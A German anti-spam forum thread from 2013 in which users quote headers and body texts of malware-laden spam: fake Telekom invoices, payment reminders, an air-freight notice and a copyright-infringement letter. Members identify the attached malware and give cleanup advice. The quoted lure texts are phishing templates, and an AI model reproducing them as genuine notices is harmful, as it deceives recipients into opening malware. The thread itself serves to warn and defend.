by simpso13.lnk.telstra.net (CommuniGate Pro SMTP 5.2.3)
with ESMTPA id 495969609 for blah [at] blub.tld; Fri, 22 Feb 2013 06:33:42 +1000
From: <rechnungonline. [at] telekom.de>
Subject: RechnungOnline Monat
Abgekippt wurde die Mail von der russischen IP 212.82.199.144 via des australischen Providers Telstra (120.151.5.222), also vermutlich via Zombie.

Der Text gaukelt via HTML täuschend echt eine ganz normale Telekom-Rechnung vor:


Ihre Rechnung für Januar 2013

Guten Tag,

mit dieser E-Mail erhalten Sie Ihre aktuelle Rechnung. Die Gesamtsumme im Monat Januar 2013 beträgt: 46,55 Euro.

Den aktuellen Einzelverbindungsnachweis – sofern von Ihnen beauftragt – und das Rechnungsarchiv finden Sie im Kundencenter. [Hinweis: Hier liegt tatsächlich der Link zum Telekom-Kundencenter.]

Diese E-Mail wurde automatisch erzeugt. Bitte antworten Sie nicht dieser Absenderadresse. Bei Fragen zu RechnungOnline nutzen Sie unser Kontaktformular.

Mit freundlichen Grüßen

R*** H***
Leiter Kundenservice
Schade nur, dass ich überhaupt kein Telekom-Kunde bin. Ansonsten würde ich vielleicht den Anhang 2013_01rechnung_714928806.zip (37,3 kB) tatsächlich mit meiner echten Rechnung verwechseln und mir so einen fetten Virrus einfangen (https://www.virustotal.com/de/file/287170cd167e584a8fd64351908d4b2230234d5fb589df4bfb4df612b47e069f/analysis/). Die Mail kopiert das tatsächliche Aussehen einer Rechnungsmitteilung sehr gut, inklusive der momentan aktuellen Werbekampagnen für Zusatzpakete und ähnliches.

Eine vorsorgliche Warnung an alle Telekom-Kunden: Bitte alle Mails, die irgendwas mit Rechnungen zu tun haben, eventuelle Dateianhänge immer erst mit einem aktualisierten Virenscanner prüfen. Ggf. auch in der Online-Variante, zum Beispiel bei Virus Total (http://www.virustotal.com).

Schönen Gruß
Mittwoch

kjz1
22.02.2013, 12:28
Und wieder eine neue Variante (Abmahnung für eine Rechnung, da hat Phiski wohl keine Ahnung):

Received: from mailout-de.gmx.net ([10.1.76.30]) by mrigmx.server.lan
(mrigmx002) with ESMTP (Nemesis) id 0M1Cg2-1V1tp333ii-00tGLk for xxxxx; Fri, 22 Feb 2013 12:00:25 +0100
Received: (qmail invoked by alias); 22 Feb 2013 11:00:20 -0000
Received: from p5DDA2E9F.dip.t-dialin.net (EHLO PC2006) [93.218.46.159]
by mail.gmx.net (mp030) with SMTP; 22 Feb 2013 12:00:20 +0100


Sehr geehrter Kunde [mein Name],

eben hat unsere Finanz-Leitung bei Ihnen eine offene Rechnung
festgestellt. Bestimmt ist es Ihrer Beachtung entgangen, die Rechnung
für Ihre Bestellung zu zahlen.

Datum Ihrer Bestellung: 16 Januar 2013 [mein Name]
Offener Rechnungsbetrag: 351,21 Euro
Produktnummer: 2674608583
Kosten dieser Mahnung: 6,00 Euro

Wir bitte Sie diesen Betrag unter Angaben genannten Bestellnummer auf
das im Kaufvertrag angegebene Konto umgehen zu überweisen.

Weitere Details entnehmen Sie bitte dem rechtskräftigen Kaufvertrag.
Bei weiteren Rückfragen stehen wir Ihrer gerne zur Verfügung.

Mit freundlichen Grüßen shirtzshop Melina Schulz

Im Anhang dann: Vertrag [mein Name].zip

Wird noch nicht überall erkannt:

https://www.virustotal.com/de/file/c5b15b9ce8e1d849ee6a89543f77e1143ce300b4818cbbdbd47b1f90d15e003f/analysis/1361531610/

http://virusscan.jotti.org/de/scanresult/f62170516753d540030064f4b94b4fc2f7797136

markusg
22.02.2013, 15:24
Gibt da 2 verschiedene, einmal mit pdf im Anhang und einmal mit Zip, dort ist ein .pdf.exe drinn.
das PDF nutzt:
CVE-2010-0188
jeder mit einem aktuellen Reader ist da also geschützt.
und läd malware von mehreren, in deutschland befindlichen websites nach, diese wurden gehackt und sind im normal falle ganz normale seiten.
http://www.trojaner-board.de/131367-telekom-spam-rechnungonline-monat-februar-2013-buchungskonto.html
http://www.trojaner-board.de/131338-telekom-spam-rechnungonline-monat.html

2 Artikel dazu

banannamamma
26.02.2013, 14:26
Hallo zusammen.
Ich bekomme auf meiner GMX Adresse auch täglich diese Mahnungen und Angebote, jeweils mit einem Anhang und einer eingefügten .com Datei.
Diese ist jeweils neu, so dass ein aktueller Scanner nicht anschlägt. Diese schicke ich dann zur Signaturerkennung ein.

Alle Mails sind in etwa gleich aufgebaut, besonders aufmerksam macht mich die Tatsache, dass ich mit meinem realen Vor und Nachnamen angesprochen werde.
Dieser ist an sich nur meinem Anbieter und mir bekannt und wird nicht beim Versenden von Mails übersendet.
Hat jemand von euch eine Idee?

truelife
26.02.2013, 15:06
Ja, Sicherheitsleck bei GMX. Auch ich werde mit echten Namen angesprochen, habe mich aber bei GMX damals bei den Registrationsdaten vertippt. Beispiel: Müllxer statt Müller.

Mittwoch
26.02.2013, 15:13
Die Probleme bei GMX werden auch hier diskutiert. AFAIK hat sich GMX offiziell noch nicht zu aktuell abhanden gekommenen Daten geäußert.

Schönen Gruß
Mittwoch

markusg
26.02.2013, 15:48
Obwohl auch über andere Anbieter dieser Vor/Nachname spam ankommt.

MeinerEiner
04.03.2013, 11:24
Im Anhang ist eine 22 KB große Zip Datei --> AWB-AVIS xxx-xxxxxxxx.pdf.zip

die ich natürlich nicht geöffnet habe.

Die xxx sind von mir dort steht eine Nr.

Habe die Adressdaten etwas entfremdet stimmen auch nicht mit den Daten auf der Webseite überein. Telefonisch ist auf der Nr. von Der Webseite niemand zu erreichen (Besetzt).



Return-Path: <cowlingsu6 [at] first-class-zollservice.de>
X-Original-To: Meinereiner
Delivered-To: Meineriner
Received: from [41.78.233.27] (unknown [41.78.233.27])
by Meinereiner (Postfix) with ESMTP id 9B7CE6632C6
for <Meinereiner>; Mon, 4 Mar 2013 11:07:06 +0100 (CET)
Received: from [183.39.23.160] (account cowlingsu6 [at] first-class-zollservice.de HELO ktycmxvoamnwqha.sserpas.info)
by (CommuniGate Pro SMTP 5.2.3)
with ESMTPA id 308589753 for Meinereiner; Mon, 4 Mar 2013 12:06:15 +0200
From: "Information" <info [at] first-class-zollservice.de>
To: <Meinereiner>
Subject: Luftfrachsendung AWB
Date: Mon, 4 Mar 2013 12:06:15 +0200
MIME-Version: 1.0
X-Priority: 3
X-Mailer: uorv.83
Message-ID: <0758276434.JE2N3IY8113525 [at] rqwfhdnefsd.ipmnbqjc.ru>
Content-Type: multipart/mixed;
boundary="----=a__rnsmkqlub_42_01_79"



Hallo,

anbei der AWB bitte bestätigen ob alles Ok ist.

Danke



Mit freundlichen Grüßen

First Class Zollservice &
Transportvermittlungs GmbH

Niederlassungsleiter

XXXX Str. XX B
64546 Mörfelden Walldorf

Tel.: XXXX
Fax: XXXX

www.first-class-zollservice.de





Schulungen im Bereich Luftsicherheit - ONLINE 3+1 Std. Schulung gemäß 185/2010 Kap. 11.2.3.9 /
Schulungen im Bereich Zoll- und Außenwirtschaft

Wir arbeiten ausschließlich auf Grundlage der Allgemeinen Deutschen Spediteurbedingungen (ADSp), jeweils neueste Fassung.
Diese beschränken in Ziffer 23 ADSp die gesetzliche Haftung für Güterschäden nach § 431 HGB für Schäden im speditionellen
Gewahrsam auf EUR 5,- je Kg. Bei multimodalen Transporten unter Einschluss einer Seebeförderung auf 2 Sonderziehungsrechte
je Kg sowie darüber hinaus je Schadenfall bzw. - ereignis auf EUR 1,0 bzw. 2,0 Mio. oder 2 Sonderziehungsrechte /kg, je nach dem,
welcher Betrag höher ist.

schara56
04.03.2013, 11:42
Passt wunder bar in das Schema hier: https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung [x] getackert
Was sagt denn http://virusscan.jotti.org/de/ oder https://www.virustotal.com/de/ zu der exe-Datei?

MeinerEiner
04.03.2013, 11:53
Der Anhang endet mit pdf.zip und ist kein Archiv ich denke mal um den Mailfilter für PDF Dateien auszuhebeln. ich kann dir die Mail gerne weiterleiten aber ich selbst spiele nicht mit verdächtigen Dateien rum ;)

Dateinamen (max. 25)
1. AWB-Avis 066-03690048.pdf.zip
2. AWB-Avis 645-76483114.pdf.zip
3. file-5217587_zip
4. AWB-Avis 679-53989602.pdf.zip


Scheint im Umlauf zu sein das kommt bei Virustotal raus allerdings nicht als Verdacht 0/46 eben keine .exe

thomas1611
04.03.2013, 13:08
me too - je 2x

Received: from bba552634.alshamil.net.ae (bba552634.alshamil.net.ae [86.98.143.184])

Received: from static.vdc.vn (unknown [113.161.82.247])

die gebräuchlichen Scanner sind noch ziemlich blind...
Virustotal (https://www.virustotal.com/de/file/0f640c40305ff756aaa119a7a856fef4e2c3bc37994d8361bdf5c644df7e9781/analysis/1362393700/)

markusg
04.03.2013, 13:38
schau mir das grad näher an, scheint aber backdoor.andromeda zu sein, hatt also mit den fake rechnungsmails eigendlich nichts zu tun.

NMT
04.03.2013, 14:50
Hallo Guten Tag,

habe mich aus gegeben Anlass hier schnell angemeldet.

leider hat eine Dame intern die zufälligerweise auch die Zollabwicklung und gerade an einer Sache in China beteiligt ist diese Mail geöffnet.
Sse hat leider Die exe geöffnet, da Sie von einem PDF ausging.

Dannach war eine Meldung das Sie alle anderen Anwendungen schließen soll danach bekam ich den Anruf!

Ist somit der Virus installiert ?

kann mir hier ein erklären was dieser Wurm/Virus/trojaner macht?

Wir kann ich Ihn erkennen?

Welches Risiko besteht?
Virenscanner können nichts erkennen.
Danke Vorab.

Firma Neumann

Mittwoch
04.03.2013, 15:02
Ist somit der Virus installiert ?
Ja, fast 100% sicher hat sich damit irgendein Schädling eingenistet.


kann mir hier ein erklären was dieser Wurm/Virus/trojaner macht?
Ohne dass der Schädling eindeutig per Virenscanner erkannt wurde, ist es schwer zu sagen, was er macht. Ich kann im Prinzip nur allgemeine Dinge über Viren, Würmer und Trojaner sagen, die man aber genauso gut und ausführlicher bei Wikipedia nachlesen kann. Wäre der Name bekannt, kann man auf den Webseiten der Hersteller von Schutzprogrammen nachlesen, was er tut, aber das nützt auch nicht viel, wenn man ihn nicht bekämpft.


Wir kann ich Ihn erkennen?
Als Laie kannst Du zwar prinzipell auch die Dinge im Auge behalten, anhand derer Profis Rechner auf Virenbefall prüfen und die auch Virenscanner im Auge behalten, allerdings muss man, um das zu verstehen, schon eine Menge darüber wissen, was auf einem Computer unter der Haube läuft. Um bei dem Bild zu bleiben: Wenn Dein Motor einen Schaden hat, kann den möglicherweise nur ein Automechaniker diagnostizieren.



Welches Risiko besteht?
Virenscanner können nichts erkennen.
Datenverlust, der Missbrauch des Rechners für illegale Tätigkeiten mit den möglicherweise daraus erwachsenden Folgen für den Inhaber als rechtlich Verantwortlichem, Spionage, etc.pp.
Wie gesagt: Ohne den namen des Schädlings kann man nicht genau sagen, was passieren kann. Dass der Virenscanner nichts erkennt, spricht dafür, dass der Schädling neueren Datums ist und im Netz noch nicht lange sein Unwesen treibt. Es müssen erst genügend Rechner befallen werden, bevor Virenabwehrspezialisten die Gefahr erkennen und geeignete Gegenmaßnahmen entwickeln können.

Ich würde Deiner Bekannten dringend dazu raten, den Computer vom Internet zu trennen (Kabel raus!), eine Datensicherung durchzuführen und dann von einem Fachmann das Betriebssystem neu aufspielen zu lassen. Alles andere wäre angesichts der Tatsache, dass sie eine exe-Datei ausführte, reine Fahrlässigkeit.

Schönen Gruß
Mittwoch

hoppala
04.03.2013, 15:05
Dannach war eine Meldung das Sie alle anderen Anwendungen schließen soll danach bekam ich den Anruf!

Was für einen Anruf? Von der Mitarbeiterin?


Ist somit der Virus installiert ?

kann mir hier ein erklären was dieser Wurm/Virus/trojaner macht?

Wir kann ich Ihn erkennen?

Welches Risiko besteht?
Virenscanner können nichts erkennen.

Da der Virus offenbar bei den gängigen Antiviren-Herstellern noch nicht bekannt ist, kann im Moment vermutlich niemand sagen, was das Ding genau macht.

Was man am besten machen sollte, weiß ich auch nicht sicher - ich persönlich würde den Rechner vom Netz trennen und auf gar keinen Fall irgendwelche Dinge damit machen, bei denen Benutzernamen, Kontonummern, Kennwörter usw. eingegeben werden. Dann erst mal abwarten, was es zu diesen Viren an Neuigkeiten gibt, und dann mit aktualisiertem Virenscanner den Rechner nochmal durchsuchen.
Wie man das bei einem Windows-Rechner am besten macht, ohne ihn ans Netz anzuschließen, weiß ich aber nicht...

hoppala

Solli
04.03.2013, 15:12
Maßnahme 1: Den betroffenen Rechner vom Netz nehmen (Firmennetz sowie Internet). Achtung, auch WLAN abklemmen!

Ich empfehle auf jeden Fall, den Virenscanner auf die neueste Version zu bringen und einen umfangreichen Scan durchzuführen. Allerdings kann es dann trotzdem sein, dass der Schädling nicht erkannt wird. Wenn man auf Nummer sicher gehen will sollte man den betreffenden PC komplett formatieren und neu aufsetzen.

Es gibt auch kostenlose Online-Virenscanner, mit denen man die .exe-Datei analysieren kann. Weiß man um welchen Schädling es sich handelt kann man im Netz nach Gegenmaßnahmen suchen.

Was Trojaner üblicherweise so machen (Aufzählung nicht vollständig): Passwörter und Daten ausspähen, Spam und Viren weiter versenden, Daten unbrauchbar machen, Online-Banking manipulieren,... Der Phantasie sind eigentlich keine Grenzen gesetzt. Wer ein verseuchtes System im Netz lässt schadet nicht nur sich sondern auch anderen.

markusg
04.03.2013, 15:16
Hier die versprochene Analyse, ums kurz zusammenzufassen:
Backdoor.bublik, läd unteranderem trojan.zbot nach, erkennung von nur signatur basierter Scansoftware ist schlecht, dropper 7/46 gedropptes 4/46
http://www.trojaner-board.de/131800-first-class-zollservice-spam-luftfrachsendung-awb.html

MeinerEiner
04.03.2013, 15:23
Komisch bei mir nix zu finden

SHA256: 46711c7d8d199b62a19a290d130d9adac55f41f06992af2fb43c22b1aa496f45



Dateiname: AWB-Avis 080-86638149.pdf.zip

Erkennungsrate: 0 / 46
Analyse-Datum: 2013-03-04 14:21:35 UTC ( vor 1 Minute )

NMT
04.03.2013, 15:45
Hallo zusammen,

Wir haben alle Möglichen Maßnahmen getroffen.

Vorerst wurde der Rechner wieder auf ein Backup von gestern zurückgesetzt.

Allerdings hat kein Virenscanner angeschlagen. Ob der Trojaner installiert worden war oder nicht sei da hingestellt.

Nachgeladen hat dieser Trojaner wenn er installiert war auch nichts, dies kann man gut anhand der Firewall erkennen ob Verbindungen von diesem Rechner ausgingen.

Naja hoffen wir mal das diese Ganoven nicht zuviel Glück haben.

Gruß

Firma Neumann

markusg
04.03.2013, 15:50
in wie fern, habt ihr ne Hardware Firewall, denn desktop firewalls die auf dem Selben pc instaliert sind, taugen nichts. es gibt genug wege, um diese zu umgehen.
die Malware setzt zumindest in der win fw ausnamen.

Solli
04.03.2013, 16:00
Außerdem würde ich nicht nur ein Backup vom Vortag einspielen sondern tatsächlich die Platte formatieren.Wenn ohnehin ein "tagesfrisches" Backup vorhanden ist hält sich der Aufwand dafür in Grenzen.

NMT
04.03.2013, 16:12
Hallo zusammen,

ja es handelt sich hier um eine Hardwarefirewall.

Ohne diese ist der Schutz im Internet nich gewähleistet.

Es ist schon Wahnsinn was die ganze Welt einem zuschickt ohne das man davon etwas mitbekommt.
China, USA, Russland, Iran lassen Grüßen

Nur was da genau passiert, dass weiß keiner.

Nur bei diesen E-mail Geschichten bringt die Beste Abwehr nichts.

Danke und Gruß

Firma Neumann

markusg
04.03.2013, 16:53
naja, du kannst ja schon mal dateinamenerweiterungen anzeigen lassen, dann siehst du ja das .pdf.exe und dass allein sollte schon stutzig machen

Solli
04.03.2013, 17:03
Dass Windows standardmäßig Dateierweiterungen ausblendet ist allerdings für eine Vielzahl von Sicherheitsvorfällen verantwortlich. Zudem man bei Ausführbaren Dateien ein beliebiges Icon anzeigen lassen kann, das z.B. dem Symbol für PDF-Dateien ähnlich sieht. Ich verstehe beim besten Willen nicht, warum das immer noch die Standardeinstellung ist.

Aber davon abgesehen sollte man in seiner Firma für die nötige "Awareness" sorgen: Man öffnet einfach keine Mailanhänge von unbekannten Absendern. Selbst wenn tatsächlich eine PDF-Datei angehängt ist kann diese Schadcode enthalten.

markusg
04.03.2013, 17:16
du hast natürlich recht, in allem was du sagst :-) aber ich denke das Anzeigen der Dateiendungen ist noch mal ein zusätzliches Warnzeichen.
Ich glaube, den Idialfall erreichen wir nie, dass alle leute genügend sensibilisiert sind, dass solche Spams ins leere laufen

isenaecher
05.03.2013, 20:36
Hallo,

nur um klarzustellen. Es gibt einen Motorpark ähnlichen Namens am Hockenheimring. Der aber mit dem o.a. nicht identisch ist. Wenn man "gurgelt" gibt es auch einen J*** W*** dessen Identität sich die Spammer offensichtlich zu Nutze gemacht haben.

Heute habe ich eine Mahnung bekommen, auf meine E-Mail-Adresse bei GMX, die ich für Anmeldungen in vertrauenswürdigen Foren oder Webportalen nutze, bekommen. Für "Experimente" nutze ich Wegwerfadressen. Angehängt war eine suspekte ZIP-Datei, die ich natürlich nicht öffne. Thunderbird hat es zuverlässig als Spam verdächtigt. Braver Vogel:goodjob:

Return-Path: mohamedalikilani [at] yahoo.fr
Received: from nm21.bullet.mail.ird.yahoo.com ([212.82.108.136]) by
mx-ha.gmx.net (mxgmx102) with ESMTP (Nemesis) id 0Meu29-1URtoJ2Aob-00OWTp for
<***>; Tue, 05 Mar 2013 11:02:18 +0100
Received: from [212.82.105.224] by nm21.bullet.mail.ird.yahoo.com with NNFMP; 05 Mar 2013 10:02:18 -0000
Received: from [217.146.188.172] by tm20.bullet.mail.ird.yahoo.com with NNFMP; 05 Mar 2013 10:02:18 -0000
Received: from [127.0.0.1] by smtp140.mail.ird.yahoo.com with NNFMP; 05 Mar 2013 10:02:18 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.fr; s=s1024; t=1362477738; bh=iz7+YKXZJLFd8QU6YuTq+xqLklcoKhgdSPUXeBmtv6g=; h=X-Yahoo-Newman-Id:Message-ID:X-Yahoo-Newman-Property:X-YMail-OSG:X-Yahoo-SMTP:Received:From:To:Subject:Date:MIME-Version:X-Mailer:X-Priority:Content-Type; b=kt+mEeAMjuaUcdC/wCnFm0gxBkK0CQTyqx8WqA+vlatM67RGos4a28F64Tk2ze3Z1iIaa1qPxNZB1QRtHwzBE5SYOb54waHU jDehkPSckhLqsmGO5oaa3PIsNTt3Jo0oZEOaFtbFAOlHSEg2pZzFR1Up/CGdcCB3hQz055WvBzQ=
X-Yahoo-Newman-Id: 43823.94582.bm [at] smtp140.mail.ird.yahoo.com
Message-ID: <43823.94582.bm [at] smtp140.mail.ird.yahoo.com>
X-Yahoo-Newman-Property: ymail-3
X-YMail-OSG: zUshyegVM1mKyoEGbzPbtQ6Pah.lZH.dx3EjbqJILfJk8Q3
yumAtt0jV6ICv1Eqndj9GBiBaSdXW7wMptwnjwCXKJ6L30CC0T2vpDQtaNoz
hleiRO3kp9Gx6FSibR2T9qFppYpE7SBfv_zsJYNqVlKs.o6T3Zs9gYGwa90K
vN9Z3a20e77CmGHAXwuuIqEqmpp0uI3oc5f9TQeUR7OrW2DaGoGKgdE4BAt7
3DbfjzhGheHhL83Kom5mdBa9dvnzc1nFcbAnHS4fep7.pAlB9ueqQPWEYQ52
oQ2jw571exUf4CO1f7KZBfC1zmwNJzhekFxVPftIknNcZ6p5voKgn3KG.1H3
WoGL314_lbKvzL9AtMDwgSBgyZ7B65FMYHef7rWuTLQ9YMPEZMLGwA31488U
SzPqqryv48peLRg3XtQyr
X-Yahoo-SMTP: TWIMTzSswBDCWIxthsD9JAz8Tlf1MAwAFurpfs4-
Received: from Laptop (mohamedalikilani [at] 88.208.147.5 with login)
by smtp140.mail.ird.yahoo.com with SMTP; 05 Mar 2013 02:02:17 -0800 PST
From: <mohamedalikilani [at] yahoo.fr>
To: "Vorname Isenächer" <Ich bei [at] gmx.de>
Date: Tue, 5 Mar 2013 10:02:15 GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
Content-Type: multipart/mixed; boundary="=-XC1FC015DA"
Envelope-To: <Ich bei [at] gmx.de>
Subject:*** GMX Spamverdacht *** Vorname Isenächer Ihre Rechnung vom 05.03.2013

Hier noch der Text

Bestelldatum: 23.01.2013 empfangen von Vorname Isenächer
Rechnungsbetrag: 366,08 Euro
Produkt-Nummer: 9199738705
Geb=C3=BChren Ihrer Mahnung: 8,00 Euro

Sehr geehrter Kunde Vorname Isenächer,

in der Hektik des Lebens haben Sie sicher nur vergessen, unsere Rechnung zu=
begleichen. Ungl=C3=BCcklicherweise konnte unsere Buchhaltung bez=C3=BCgli=
ch der angeh=C3=A4ngten Rechnung noch keinen Eingang ersehen.=20

Wir bitte Sie diesen Betrag unter Angaben der oben genannten Bestellnummer =
bis zum 09.03.2013 auf das im Kaufvertrag angegebene Konto umgehen zu =C3=BC=
berweisen. Sofern Sie den genannten Termin nicht einhalten, werden wir Ihne=
n weitere Verzugszinsen und Mahnkosten berechnen.

Eine weitere Mahnung erfolgt nicht.=20

Sollten Sie die Zahlung nicht fristgem=C3=A4=C3=9F vornehmen, wird die Ford=
erung an ein Inkassounternehmen =C3=BCberreicht, was mit weiteren Kosten zu=
Ihren Lasten verbunden sein wird.=20

Mit bestem Dank f=C3=BCr Ihr Vertrauen in=20
Motorpark Schremps J*** W***

Huch, hab ich jetzt Angst vor dem Inkassounternehmen:scared:

Was mich allerdings wundert: Dort, wo "Vorname Isenächer" steht, war mein Klarname. Und den können eigentlich nur die Portale und Foren bzw. Adressaten, die ich kenne, sehen. Gibt es Erfahrungen, ob vermeintlich zuverlässige Portale wie GMX o.ä. undicht sind ? Oder lässt sich das irgendwie auslesen ?

Gruß

Isenächer

blizzy
05.03.2013, 20:46
In Zusammenhang mit gmx liest man in letzter Zeit immer wieder von Spam, der per nur gmx bekanntem Namen personalisiert ist.


Siehe auch:

https://www.antispam-ev.de/forum/showthread.php?34585-Datenleck-bei-GMX

blizzy
07.03.2013, 14:12
Hier wird eine (wortwörtlich) "Luftfrachsendung" angekündigt:

Return-Path: <monolithicp38 [at] first-class-zollservice.de>
Received: from mailin50.aul.t-online.de ([172.20.26.255])
by ehead408.aul.t-online.de (Dovecot) with LMTP id udfzFn91OFGcVAAAOujf2A;
Thu, 07 Mar 2013 13:58:51 +0100
Received: from c2337c29.fsp.oleane.fr ([194.51.124.41]) by mailin50.aul.t-online.de
with esmtp id 1UDaPD-0bnfqA0; Thu, 7 Mar 2013 13:58:43 +0100
Received: from [199.104.98.123] (account monolithicp38 [at] first-class-zollservice.de HELO qxjxkrkdvzka.zwwpgtirbgtdbd.net)
by c2337c29.fsp.oleane.fr (CommuniGate Pro SMTP 5.2.3)
with ESMTPA id 836763749 for h.graef [at] t-online.de; Thu, 7 Mar 2013 13:58:42 +0100
From: "Information" <info [at] first-class-zollservice.de>
To: <meine.addy [at] xxxxxxxx.de>
Subject: Luftfrachsendung AWB
Date: Thu, 7 Mar 2013 13:58:42 +0100
MIME-Version: 1.0
X-Priority: 3
X-Mailer: xykll-15
Message-ID: <8594619023.EATZ31CG589386 [at] otfzaa.ufecvfwiegvos.org>
Content-Type: multipart/mixed;
boundary="----=a__vuug_31_37_13"
X-TOI-SPAM: n;1;2013-03-07T12:58:51Z
X-TOI-VIRUSSCAN: clean
X-TOI-EXPURGATEID: 149288::1362661124-0000550D-5848629C/0-0/0-7
X-TOI-SPAMCLASS: DANGEROUS, ATTACHMENT
X-TOI-MSGID: 6b752f43-7c06-4a81-8d47-a1ebcd556ca0
X-Seen: false
X-ENVELOPE-TO: <meine.addy [at] xxxxxxxxx.de>




v\:* {behavior:url(#default#VML);}o\:* {behavior:url(#default#VML);}w\:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);} Hallo, anbei der AWB bitte bestätigen ob alles Ok ist. Danke Mit freundlichen Grüßen First Class Zollservice & Transportvermittlungs GmbH Niederlassungsleiter Nordendstraße. 32 B 64546 Mörfelden Walldorf www.first-class-zollservice.de Schulungen im Bereich Luftsicherheit - ONLINE 3+1 Std. Schulung gemäß 185/2010 Kap. 11.2.3.9 / Schulungen im Bereich Zoll- und Außenwirtschaft Wir arbeiten ausschließlich auf Grundlage der Allgemeinen Deutschen Spediteurbedingungen (ADSp), jeweils neueste Fassung. Diese beschränken in Ziffer 23 ADSp die gesetzliche Haftung für Güterschäden nach § 431 HGB für Schäden im speditionellen Gewahrsam auf EUR 5,- je Kg. Bei multimodalen Transporten unter Einschluss einer Seebeförderung auf 2 Sonderziehungsrechte je Kg sowie darüber hinaus je Schadenfall bzw. - ereignis auf EUR 1,0 bzw. 2,0 Mio. oder 2 Sonderziehungsrechte /kg, je nach dem, welcher Betrag höher ist.

Natürlich mit angehängter zip.

Baldrian
07.03.2013, 17:28
Bekam heute den gleichen Zoll-Schrott. :mad:
Mit einer xxxpdf.zip-Datei. Hab es natürlich sofort gelöscht.
Ein Bekannter bekam auch schon einige "Mahnungen",
bei mir waren es "nur" 3.
Ich hoffe, es fallen nicht viele auf diese Masche rein
und öffnen die Datei.

RolandKertel
11.03.2013, 14:01
das habe ich eben bekommen, nebst 114_TKG.zip-Anhang.
Betreff war 'Urheberrechtsverletzung als Teilnehmer'.
Sieht ja nach Spam aus, konnte aber rein gar nichts dazu im Netz finden. Irgendwie seltsam.



"Gegenstand unserer Beauftragung ist eine über Ihren Internetanschluss im Internet begangene Urheberrechtsverletzung als Teilnehmer eines so genannten Peer-to-Peer-Netzwerkes

Folgende Daten konnte unsere Mandantschaft - neben weiteren Einwahlen - aufgrund einer speziell entwickelten Software feststellen und beweissicher dokumentieren lassen

Im Rahmen eines staatsanwaltlichen Auskunftsverlangens gemäß § 113 TKG wurde mitgeteilt, dass der festgestellte Internetanschluss auf Ihren Namen angemeldet ist, so dass Sie für die Urheberrechtsverletzung, welche unter Nutzung des Anschlusses begangen wurde, zivilrechtlich haften. "

Gerlach
11.03.2013, 14:17
Willkommen im Forum.

Kurze Antwort: Ist Spam.

Das kann man beispielsweise hieran erkennen:

Absender (T-Mobile) der E-Mail passt nicht zum Absender laut Text ("Beauftragter" und ganz sicher nicht T-Mobile). Beides ist übrigens gleichermaßen frei fälschbar.
Kein vollständiges Impressum innerhalb der E-Mail.
Kontaktaufnahme findet überhaupt per E-Mail statt anstatt Brief/Einschreiben.
zip-Anhang deutet auf den eigentlichen Zweck hin: der eigene Rechner soll mit einer Schadsoftware angegriffen werden. Daher nicht öffnen!


Eine noch bessere Analyse ist möglich, wenn der sogenannte "Header" hier veröffentlicht wird. Darin befindet sich beispielsweise eine eindeutige Kennung des Netzwerkes, aus dem die E-Mail verschickt wurde. Das ist im Gegensatz zur Absender-E-Mail nicht fälschbar. Man kann dann prüfen, ob das Netzwerk für den angeblichen Versender plausibel ist. Oft stellt sich heraus, dass die E-Mail aus einem Netzwerk aus China, Korea oder sonstwo aus dem Ausland stammt. Da ist es schnell eindeutig, dass es sich um Spam handelt.

Im Antispam-Wiki (http://www.antispam-ev.de/wiki/Portal) gibt es viel Lesestoff.

homer
11.03.2013, 14:30
das habe ich eben bekommen, nebst 114_TKG.zip-Anhang.
-> Phishing/Exploits, einer unserer Mail-Virenscanner meldet

999_TKG.zip: Suspect.DoubleExtension-zippwd-15

wobei 999 eine beliebige dreistellige Zahl ist.

RolandKertel
11.03.2013, 14:33
Danke !!!

Jogy4711
11.03.2013, 18:26
der Header zur Spam-mail wegen angebl. Urheberrechtsverletzung

Hier auflageschlagen 11 Mar 2013 13:12:56

Received: (qmail 20499 invoked from network); 11 Mar 2013 13:13:19 -0000
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
spamkill08do.versatel-west.de
X-Spam-Status: No, score=4.1
Received: from host93-0-static.107-82-b.business.telecomitalia.it ([82.107.0.93])
(envelope-sender <deeaz [at] t-mobile.de>)
by mail02do.versatel.de (qmail-ldap-1.03) with SMTP
for <Meine [at] adresse.de>; 11 Mar 2013 13:12:56 -0000
Received: from [34.141.146.133] (account spread8 [at] t-mobile.de HELO cwbvccnuzmjf.bjokgjxmskr.va)
by host93-0-static.107-82-b.business.telecomitalia.it (CommuniGate Pro SMTP 5.2.3)
with ESMTPA id 837063373 for Meine [at] adresse.de; Mon, 11 Mar 2013 14:12:55 +0100
From: <noreply [at] t-mobile.de>
To: <Meine [at] adresse.de>
Subject: Urheberrechtsverletzung als Teilnehmer
Date: Mon, 11 Mar 2013 14:12:55 +0100
MIME-Version: 1.0
X-Priority: 3
X-Mailer: dhjt 26
Message-ID: <1560827498.P5SS6CLY973438 [at] coofhxyhfhq.ulmsmoelooi.info>
Content-Type: multipart/mixed;
boundary="----=a__xvizeuojmf_62_42_62"
X-VT-Original-To: Meine [at] adresse.de
------=a__xvizeuojmf_62_42_62
Content-Type: multipart/alternative;
boundary="----=_xvizeuojmf_62_42_62"

------=_xvizeuojmf_62_42_62
Content-Type: text/plain;
charset="windows-1250"
Content-Transfer-Encoding: quoted-printable

erdbeernase
11.03.2013, 20:33
hab ich auch bekommen :-)

Received: from [185.11.233.215] (unknown [185.11.233.215])
byxxx.xxx.xxx (Postfix) with ESMTP id 0AB1D5F6211D
for <xxx [at] xxx.xxx>; Mon, 11 Mar 2013 13:31:17 +0100 (CET)
Received: from [42.110.18.94] (account antietamjpy82 [at] t-mobile.de HELO tczgiznoz.prkbul.net)
by (CommuniGate Pro SMTP 5.2.3)
with ESMTPA id 707672934 for xxx [at] xxx.xxx; Mon, 11 Mar 2013 13:31:17 +0100
From: <noreply [at] t-mobile.de>
To: <xxx [at] xxx.xxx>
Subject: *** VIRUS ***Urheberrechtsverletzung als Teilnehmer
Date: Mon, 11 Mar 2013 13:31:17 +0100
MIME-Version: 1.0
X-Priority: 3
X-Mailer: rrroywt 25
Message-ID: <2958495589.0M1WJYLP092245 [at] xatkhllpsirijdb.jgurys.su>
Content-Type: multipart/mixed;
boundary="----=a__vnkaurmogp_62_51_70"
X-Antivirus-Status: Infected
